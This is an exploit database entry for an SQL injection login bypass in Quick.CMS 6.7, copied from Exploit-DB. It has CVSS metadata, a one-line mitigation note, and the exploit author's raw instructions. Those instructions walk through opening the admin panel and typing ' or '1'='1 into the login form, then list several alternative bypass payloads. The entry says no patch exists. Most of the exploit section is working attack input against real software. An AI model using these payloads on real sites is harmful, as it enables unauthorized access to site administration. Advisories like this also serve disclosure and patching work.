Quick.CMS 6.7 SQL Injection Login Bypass

vendor:

Quick.CMS

by:

./H4X.Forensics - Diyar

6.1

CVSS

HIGH

SQL Injection

CWE

Product Name: Quick.CMS

Affected Version From: 6.7

Affected Version To: 6.7

Patch Exists: NO

Related CWE:

CPE: a:opensolution:quick.cms:6.7

Metasploit:

Other Scripts:

Platforms Tested: Windows

2024

Quick.CMS 6.7 SQL Injection Login Bypass

The exploit allows an attacker to bypass authentication in Quick.CMS 6.7 by using a specific SQL injection payload. By entering the payload ' or '1'='1 in the email field and proceeding with the login, the attacker can successfully bypass the authentication and gain unauthorized access to the admin panel.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user inputs, implement prepared statements or parameterized queries, and apply the principle of least privilege.

Source

Exploit-DB raw data:

# Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass
# Google Dork: N/A
# Date: 02-03-2024
# Exploit Author: ./H4X.Forensics - Diyar
# Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/>
# Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip]
# Version: 6.7
# Tested on: Windows
# CVE : N/A

How to exploit :

*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php
*--> Enter any Email like : root@root.com<mailto:root@root.com>
*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1
*--> Tick the Checkbox
*--> Press Login
*--> Congratz!

 *--> SQL Injection Authentication Bypass Payload : ' or '1'='1

*--> Payloads Can be use :

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '